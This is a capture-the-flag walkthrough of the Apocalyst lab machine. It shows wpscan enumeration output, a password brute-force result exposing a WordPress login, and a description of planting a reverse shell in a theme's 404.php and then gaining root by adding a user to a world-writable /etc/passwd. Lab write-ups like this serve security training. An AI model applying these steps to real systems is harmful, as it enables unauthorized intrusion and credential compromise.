10.10.10.46 - Apocalyst
Run Nmap with -sV for service detection, -O os-detection -A aggressive on 10.10.10.46:
We discover directory structure and version of apache server 2.4.18 running on Ubuntu Xenial and Wordpress 4.8.
Virtual host present as informed by NoScript extension. Add apocalyst.htb to /etc/hosts:
wp-admin login page:
Output of wpscan:
1
└──╼ $wpscan --url apocalyst.htb --enumerate u
2
_______________________________________________________________
3
__ _______ _____
4
\ \ / / __ \ / ____|
5
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
6
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
7
\ /\ / | | ____) | (__| (_| | | | |
8
\/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10
WordPress Security Scanner by the WPScan Team
11
Version 3.5.3
12
Sponsored by Sucuri - https://sucuri.net
13
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
14
_______________________________________________________________
15
16
[+] URL: http://apocalyst.htb/
17
[+] Started: Tue May 21 00:27:25 2019
18
19
Interesting Finding(s):
20
21
[+] http://apocalyst.htb/
22
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
23
| Found By: Headers (Passive Detection)
24
| Confidence: 100%
25
26
[+] http://apocalyst.htb/xmlrpc.php
27
| Found By: Direct Access (Aggressive Detection)
28
| Confidence: 100%
29
| References:
30
| - http://codex.wordpress.org/XML-RPC_Pingback_API
31
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
32
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
33
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
34
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
35
36
[+] http://apocalyst.htb/readme.html
37
| Found By: Direct Access (Aggressive Detection)
38
| Confidence: 100%
39
40
[+] Upload directory has listing enabled: http://apocalyst.htb/wp-content/uploads/
41
| Found By: Direct Access (Aggressive Detection)
42
| Confidence: 100%
43
44
[+] http://apocalyst.htb/wp-cron.php
45
| Found By: Direct Access (Aggressive Detection)
46
| Confidence: 60%
47
| References:
48
| - https://www.iplocation.net/defend-wordpress-from-ddos
49
| - https://github.com/wpscanteam/wpscan/issues/1299
50
51
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
52
| Detected By: Rss Generator (Passive Detection)
53
| - http://apocalyst.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.8</generator>
54
| - http://apocalyst.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.8</generator>
55
|
56
| [!] 27 vulnerabilities identified:
57
|
58
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
59
| Fixed in: 4.8.2
60
| References:
61
| - https://wpvulndb.com/vulnerabilities/8905
62
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
63
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
64
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
65
|
66
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
67
| Fixed in: 4.8.2
68
| References:
69
| - https://wpvulndb.com/vulnerabilities/8910
70
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
71
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
72
| - https://core.trac.wordpress.org/changeset/41398
73
|
74
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
75
| Fixed in: 4.8.2
76
| References:
77
| - https://wpvulndb.com/vulnerabilities/8911
78
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
79
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
80
| - https://core.trac.wordpress.org/changeset/41457
81
|
82
| [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
83
| Fixed in: 4.8.2
84
| References:
85
| - https://wpvulndb.com/vulnerabilities/8912
86
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
87
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
88
| - https://core.trac.wordpress.org/changeset/41397
89
|
90
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
91
| Fixed in: 4.8.2
92
| References:
93
| - https://wpvulndb.com/vulnerabilities/8913
94
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
95
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
96
| - https://core.trac.wordpress.org/changeset/41448
97
|
98
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
99
| Fixed in: 4.8.2
100
| References:
101
| - https://wpvulndb.com/vulnerabilities/8914
102
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
103
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
104
| - https://core.trac.wordpress.org/changeset/41395
105
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
106
|
107
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
108
| References:
109
| - https://wpvulndb.com/vulnerabilities/8807
110
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
111
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
112
| - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
113
| - https://core.trac.wordpress.org/ticket/25239
114
|
115
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
116
| Fixed in: 4.8.3
117
| References:
118
| - https://wpvulndb.com/vulnerabilities/8941
119
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
120
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
121
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
122
| - https://twitter.com/ircmaxell/status/923662170092638208
123
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
124
|
125
| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
126
| Fixed in: 4.8.4
127
| References:
128
| - https://wpvulndb.com/vulnerabilities/8966
129
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
130
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
131
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
132
|
133
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
134
| Fixed in: 4.8.4
135
| References:
136
| - https://wpvulndb.com/vulnerabilities/8967
137
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
138
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
139
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
140
|
141
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
142
| Fixed in: 4.8.4
143
| References:
144
| - https://wpvulndb.com/vulnerabilities/8968
145
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
146
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
147
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
148
|
149
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
150
| Fixed in: 4.8.4
151
| References:
152
| - https://wpvulndb.com/vulnerabilities/8969
153
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
154
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
155
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
156
|
157
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
158
| Fixed in: 4.8.5
159
| References:
160
| - https://wpvulndb.com/vulnerabilities/9006
161
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
162
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
163
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
164
| - https://core.trac.wordpress.org/ticket/42720
165
|
166
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
167
| References:
168
| - https://wpvulndb.com/vulnerabilities/9021
169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
170
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
171
| - https://github.com/quitten/doser.py
172
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
173
|
174
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
175
| Fixed in: 4.8.6
176
| References:
177
| - https://wpvulndb.com/vulnerabilities/9053
178
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
179
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
180
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
181
|
182
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
183
| Fixed in: 4.8.6
184
| References:
185
| - https://wpvulndb.com/vulnerabilities/9054
186
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
187
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
188
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
189
|
190
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
191
| Fixed in: 4.8.6
192
| References:
193
| - https://wpvulndb.com/vulnerabilities/9055
194
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
195
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
196
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
197
|
198
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
199
| Fixed in: 4.8.7
200
| References:
201
| - https://wpvulndb.com/vulnerabilities/9100
202
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
203
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
204
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
205
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
206
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
207
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
208
|
209
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
210
| Fixed in: 4.8.8
211
| References:
212
| - https://wpvulndb.com/vulnerabilities/9169
213
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
214
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
215
|
216
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
217
| Fixed in: 4.8.8
218
| References:
219
| - https://wpvulndb.com/vulnerabilities/9170
220
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
221
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
222
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
223
|
224
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
225
| Fixed in: 4.8.8
226
| References:
227
| - https://wpvulndb.com/vulnerabilities/9171
228
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
229
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
230
|
231
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
232
| Fixed in: 4.8.8
233
| References:
234
| - https://wpvulndb.com/vulnerabilities/9172
235
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
236
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
237
|
238
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
239
| Fixed in: 4.8.8
240
| References:
241
| - https://wpvulndb.com/vulnerabilities/9173
242
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
243
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
244
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
245
|
246
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
247
| Fixed in: 4.8.8
248
| References:
249
| - https://wpvulndb.com/vulnerabilities/9174
250
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
251
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
252
|
253
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
254
| Fixed in: 4.8.8
255
| References:
256
| - https://wpvulndb.com/vulnerabilities/9175
257
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
258
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
259
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
260
|
261
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
262
| Fixed in: 5.0.1
263
| References:
264
| - https://wpvulndb.com/vulnerabilities/9222
265
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
266
| - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
267
|
268
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
269
| Fixed in: 4.8.9
270
| References:
271
| - https://wpvulndb.com/vulnerabilities/9230
272
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
273
| - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
274
| - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
275
| - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
276
277
[+] WordPress theme in use: twentyseventeen
278
| Location: http://apocalyst.htb/wp-content/themes/twentyseventeen/
279
| Last Updated: 2019-05-07T00:00:00.000Z
280
| Readme: http://apocalyst.htb/wp-content/themes/twentyseventeen/README.txt
281
| [!] The version is out of date, the latest version is 2.2
282
| Style URL: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
283
| Style Name: Twenty Seventeen
284
| Style URI: https://wordpress.org/themes/twentyseventeen/
285
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
286
| Author: the WordPress team
287
| Author URI: https://wordpress.org/
288
|
289
| Detected By: Css Style (Passive Detection)
290
|
291
| Version: 1.3 (80% confidence)
292
| Detected By: Style (Passive Detection)
293
| - http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
294
295
[+] Enumerating Users (via Passive and Aggressive Methods)
296
Brute Forcing Author IDs - Time: 00:00:01 <=================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01
297
298
[i] User(s) Identified:
299
300
[+] falaraki
301
| Detected By: Author Posts - Display Name (Passive Detection)
302
| Confirmed By:
303
| Rss Generator (Passive Detection)
304
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
305
| Login Error Messages (Aggressive Detection)
306
307
308
[+] Finished: Tue May 21 00:27:32 2019
309
[+] Requests Done: 25
310
[+] Cached Requests: 38
311
[+] Data Sent: 4.864 KB
312
[+] Data Received: 244.238 KB
313
[+] Memory used: 93.688 MB
314
[+] Elapsed time: 00:00:06
Copied!
User falaraki identified as an author of the posts.
Directories enumeration returns 301 - moved permanently on each and every page:
However if we generate the word list with CeWL first and run it against apocalyst.htb we see that one of the files have a different size:
Most of the time, during CTF scenarios files are hidden within images. For purpose of extracting any hidden data we can use steghide:
password blank (ENTER)
With the discovered username and probable password list.txt we can start bruteforcing our way in:
1
[+] Performing password attack on Wp Login against 1 user/s
2
[SUCCESS] - falaraki / Transclisiation
3
Trying falaraki / total Time: 00:00:19 <===================================================================================================================================================================> (335 / 335) 100.00% Time: 00:00:19
4
5
[i] Valid Combinations Found:
6
| Username: falaraki, Password: Transclisiation
7
8
9
[+] Finished: Tue May 21 00:29:31 2019
10
[+] Requests Done: 358
11
[+] Cached Requests: 34
12
[+] Data Sent: 98.017 KB
13
[+] Data Received: 1.226 MB
14
[+] Memory used: 170.918 MB
15
[+] Elapsed time: 00:00:26
Copied!
In this case password Transclisiation has been discovered that allowed us to login:
Let's modify 404.php to include reverse shell instructions back to attackers machines and trigger the shell by visiting:
1
apocalyst.htb/wp-content/themes/twentyseventeen/404.php
Copied!
Successful reverse shell:
Mystery of apocalyst unfolds:
When we run LinEnum.sh privilege escalation check we find out that the permissions on the file /etc/passwd are lax and can be modified by everyone:
Since we have a read and write access to /etc/passwd file we can create our own privileged user. Openssl comes handy in creating a new password in acceptable format:
Once we have the salted password all we need to do in order to get root access is to add a new user to the /etc/passwd file:
User offsec added
And login with su offsec, password offsec to gain a root privilege on the machine:
Copy link